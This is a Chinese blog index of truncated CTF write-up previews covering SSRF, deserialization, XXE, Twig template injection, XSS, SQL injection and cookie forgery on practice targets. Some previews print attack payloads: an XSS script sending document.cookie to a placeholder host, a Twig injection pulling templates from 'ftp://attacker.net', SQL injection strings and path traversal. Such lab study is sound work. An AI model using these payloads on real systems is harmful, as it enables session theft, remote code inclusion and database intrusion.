凌晨四点起床刷题
CTF向刷题集,非纯wp,包含技术点总结
車鈊
热爱编程,正在钻研网络安全方向,欢迎来交流啊。
展开
-
[BUU/SSRF] [De1CTF 2019]SSRF Me
[De1CTF 2019]SSRF Me初审整理源代码#! /usr/bin/env python# #encoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport json# reload(sys)# sys.setdefaultencoding('latin1')app = Fla原创 2021-10-14 20:36:16 · 286 阅读 · 1 评论 -
[BUU/反序列化/Phar] [CISCN2019 华北赛区 Day1 Web1]Dropbox
注册登录,上传图片,可以下载文件,对文件下载进行抓包,此处可下载任意文件,filename=../../index.php找到class.php<?php class User { public $db; // 触发FileList的__call() public function __destruct() { $this->db->close(); }}class FileList { private $f原创 2021-10-14 17:18:34 · 216 阅读 · 0 评论 -
[WP/ctfshow/XXE]ctfshow_XXE_web373-378
外部实体注入WEB373// 允许加载外部实体libxml_disable_entity_loader(false);// xml文件来源于数据流$xmlfile = file_get_contents('php://input');if(isset($xmlfile)){ $dom = new DOMDocument(); // 加载xml实体,参数为替代实体、加载外部子集 $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_原创 2021-10-13 22:07:50 · 931 阅读 · 0 评论 -
[WP/BUU/Web/反序列化] [MRCTF2020]Ezpop
源码Welcome to index.php<?php//flag is in flag.php//WTF IS THIS?//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95//And Crack It!class Modifier { protected $var; // 包原创 2021-10-13 22:03:24 · 166 阅读 · 0 评论 -
[WP/BUU] [0CTF 2016]piapiapia
**www.zip **可下载源码审计源码config.php暗示flag在本文件<?php $config['hostname'] = '127.0.0.1'; $config['username'] = 'root'; $config['password'] = ''; $config['database'] = ''; $flag = '';?>register.php注册逻辑<?php require_once('class.php'); if($_原创 2021-10-13 13:36:24 · 195 阅读 · 0 评论 -
[WP/WEB/反序列化/未完]CTFshow-web257-268
Web257<?phpclass ctfShowUser{ private $username='xxxxxx'; private $password='xxxxxx'; private $isVip=false; private $class = 'info'; public function __construct(){ $this->class=new backDoor(); } public function原创 2021-10-12 00:05:45 · 934 阅读 · 0 评论 -
[WP/Buu/RCE]-[CISCN 2019 初赛]Love Math
[CISCN 2019 初赛]Love Math源码 <?phperror_reporting(0);//听说你很喜欢数学,不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){ show_source(__FILE__);}else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); }原创 2021-08-08 10:55:32 · 182 阅读 · 0 评论 -
[WP/BUU/SSRF/SQLI/反序列化] [网鼎杯 2018]Fakebook解题+分析
[网鼎杯 2018]Fakebook扫描测试,robots.txt 可读User-agent: *Disallow: /user.php.bak下载,源代码展示了UserInfo类,<?phpclass UserInfo{ public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) {原创 2021-07-31 05:23:12 · 255 阅读 · 0 评论 -
[WP/BUU/Unicode编码]BUUCTF Unicorn shop题解
[ASIS 2019]Unicorn shop测试商店页面,逻辑大致为输入相应的商品号和支付金额购买商品,用1号商品抓包测试,错误的商品,继续测试2、3均如此,直到4正常了但是钱不够,输入更多钱仅允许一个字符输入分析9999为四个字符,编码后也是如此9999%u0039%u0039%u0039%u0039因此,我们需要找到一个代指的数字超过1337.0的单个字符,我们从Unicode编码库中寻找https://www.compart.com/en/unicode/%u2原创 2021-07-31 05:21:19 · 357 阅读 · 0 评论 -
[WP/BUU/CTF]Cookie Store 题解
简单题,涉及Cookie的使用方法存储-Cookie-session-值base64解码eyJtb25leSI6IDUwLCAiaGlzdG9yeSI6IFtdfQ==// 解码{"money": 50, "history": []}后台通过base64存储用户信息,是及其危险的,可以伪造数据{"money": 100, "history": []}// 编码eyJtb25leSI6IDEwMCwgImhpc3RvcnkiOiBbXX0=替换Value,刷新,购买flag即可..原创 2021-07-31 05:18:42 · 444 阅读 · 0 评论 -
[WP/SSTI/PHP_Twig]Cookie is so stable解题/Twig模板注入
[BJDCTF2020]Cookie is so stablePHP-Twig模板注入参考了知乎大佬的文章:https://zhuanlan.zhihu.com/p/28823933通过_self我们可以调用环境变量中的env属性,当PHP打开远程加载文件的参数(allow_url_include)时,问我们可以通过它来实现远程文件包含{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor原创 2021-07-23 01:11:44 · 597 阅读 · 1 评论 -
[WP/CTFshow]XSS Web316-333
CTFSHOW WP题目的原理就是靶机的bot每隔一段时间访问输入的内容,模拟了反射型XSS316.需要配套接收端XSS脚本如果未过滤script且对外部资源加载无限制的情况下,可以指定src为精心准备的JS文件,使其加载,产生携带COOKIE的请求。本解法直接将产生请求写在了表层。<script>document.location.href='http://xxxxxxxxxxxxxxxxxxxx/x.php?1='+document.cookie</script>3原创 2021-07-11 21:44:36 · 1718 阅读 · 2 评论 -
[WP-Bugku积累-正则bypasss] No one knows regex better than me
No one knows regex better than me记Bugku一道关于PHP正则的新加题目题目源码:<?php error_reporting(0);$zero=$_REQUEST['zero'];$first=$_REQUEST['first'];$second=$zero.$first;if(preg_match_all("/Yeedo|wants|a|girl|friend|or|a|flag/i",$second)){ $key=$second;原创 2021-03-04 10:03:26 · 1678 阅读 · 3 评论 -
[WP-SWPU2019]web1/二次注入原理和利用/information_schema的替代方案
二次注入原理查询前对输入进行转义处理,导致注入无法生效。恶意语句插入到了数据库当中,导致恶意数据被读取并进入到SQL查询语句时,进行了数据查询操作,造成了注入,导致了恶意语句的执行。产生原因恶意语句保存到数据库之前,特殊字符会被转义,写入时又复原为原来的数据。默认数据库数据是安全的,没有对取出的数据进行检验。可能场景博客评论系统:添加评论时,用户将信息保存在数据库当中,再次查询时,恶意语句被查询语句引用,造成了二次注入。广告发布:同上登录状态下的密码修改服务(update修改其他用原创 2021-06-12 09:00:50 · 249 阅读 · 2 评论 -
BUU - [极客大挑战 2019]BabySQL
题目提示对输入进行了过滤?username=admin&password=1' or 1=1#猜测是过滤了or,双写绕过?username=admin&password=1'oorr 1=1%23正常登录进入注入流程查库名猜测列数,试回显位置?username=admin&password=1' ununionion seselectlect 1,2,3%23查询库名?username=admin&password=1' union select原创 2021-03-14 20:22:08 · 231 阅读 · 1 评论 -
[WP-Buuoj-极客大挑战2019-信息泄露/反序列化]PHP
进入网页,根据提示,估计网站存在备份文件存在任意下载漏洞尝试获取源码常见的网站源码备份文件后缀.rar/.zip/.7z/.tar/.tar.gz/.bak/.swp/.txt/.html/常见的网站源码备份文件名web/website/backup/back/www/wwwroot/temp经过尝试www.zip为该备份,未删除或设置权限,可进行下载操作。tip:也可以尝试使用御剑和disearch进行扫描打开压缩包,得到网站源码分析源码源码核心为2部分index.phpcl.原创 2021-03-13 23:08:00 · 238 阅读 · 4 评论 -
[MRCTF2020]Ezaudit WP
进入网站获得源码看到熟悉的网页模板想到了敏感文档泄露和用户信息查询点击全部链接,尝试输入邮箱发现不是。完事以后测试其他文件泄露,尝试进行目录遍历,跑脚本python dirsearch.py -u http://77936295-dc14-466d-9fe7-6cdc5a55a916.node3.buuoj.cn/ -e * --threads=1发现无论多小的线程速度都会产生429状态码原来是服务器限制了访问的频率,猜测和BUUCTF服务器有关系。只能进行手工检测发现在www.z原创 2020-10-23 20:20:38 · 482 阅读 · 1 评论